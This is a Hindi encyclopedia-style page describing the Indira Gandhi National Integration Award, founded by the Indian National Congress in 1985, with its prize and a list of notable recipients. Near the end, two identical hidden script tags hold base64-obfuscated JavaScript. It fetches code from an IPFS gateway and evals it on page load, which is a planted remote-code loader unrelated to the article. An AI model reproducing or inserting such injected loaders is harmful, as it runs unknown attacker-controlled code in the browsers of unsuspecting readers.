इंदिरा गाँधी राष्ट्रीय एकता पुरस्कार

भारत डिस्कवरी प्रस्तुति
गोविन्द राम (चर्चा | योगदान) द्वारा परिवर्तित 14:42, 18 नवम्बर 2013 का अवतरण (Adding category Category:इन्दिरा गाँधी (को हटा दिया गया हैं।))
यहाँ जाएँ:भ्रमण, खोजें

इंदिरा गाँधी राष्ट्रीय एकता पुरस्कार एक प्रतिष्ठित पुरस्कार है जिसकी स्थापना भारतीय राष्ट्रीय कांग्रेस ने अपनी शताब्दी वर्ष 1985 को की थी। राष्ट्रीय एकता एवं सद्भावना के विचार को बनाए रखने की दिशा में अनुकरणीय योगदान के लिए व्यक्तिगत रूप से या संस्थाओं को यह पुरस्कार प्रदान किया जाता है। सम्मानित व्यक्ति को पुरस्कार के तौर पर 5 लाख रूपये की नकद राशि और एक प्रशस्ति पत्र दिया जाता है। यह पुरस्कार राष्ट्रीय एकता को बढ़ाने और उसे संरक्षित करने के लिए किये गये अतुलनीय कार्यों के लिए दिया जाता है। यह पुरस्कार भारत की प्रथम महिला प्रधानमंत्री इंदिरा गाँधी के बलिदान दिवस 31 अक्टूबर को दिया जाता है। इंदिरा गांधी के नाम पर एक अन्य पुरस्कार इंदिरा गांधी मेमोरियल ट्रस्ट के द्वारा इंदिरा गांधी शांति, निःशस्त्रीकरण और विकास पुरस्कार दिया जाता है, जिसे इंदिरा गांधी शांति पुरस्कार या इंदिरा गांधी पुरस्कार भी कहा जाता है।

सम्मानित व्यक्ति

अब तक जिन लेागों को यह पुरस्कार मिला हैं उनमें पूर्व राष्ट्रपति ए पी जे अब्दुल कलाम और शंकर दयाल शर्मा, पूर्व प्रधानमंत्री राजीव गांधी, पंजाब के पूर्व मुख्यमंत्री बेअंत सिंह, अरुणा आसफ़ अली, श्याम बेनेगल, जावेद अख़्तर, ए आर रहमान, महाश्वेता देवी और मोहन धारिया शामिल हैं। जिन संस्थाओं को इस पुरस्कार से सम्मानित किया गया है उनमें भारत स्काउट एडं गाइड्स, परमधाम आश्रम पवनार, वर्धा, कस्तूरबा गांधी राष्ट्रीय स्मारक ट्रस्ट इंदौर और रामकृष्ण मिशन आश्रम नारायणपुर छत्तीसगढ प्रमुख हैं।



पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

संबंधित लेख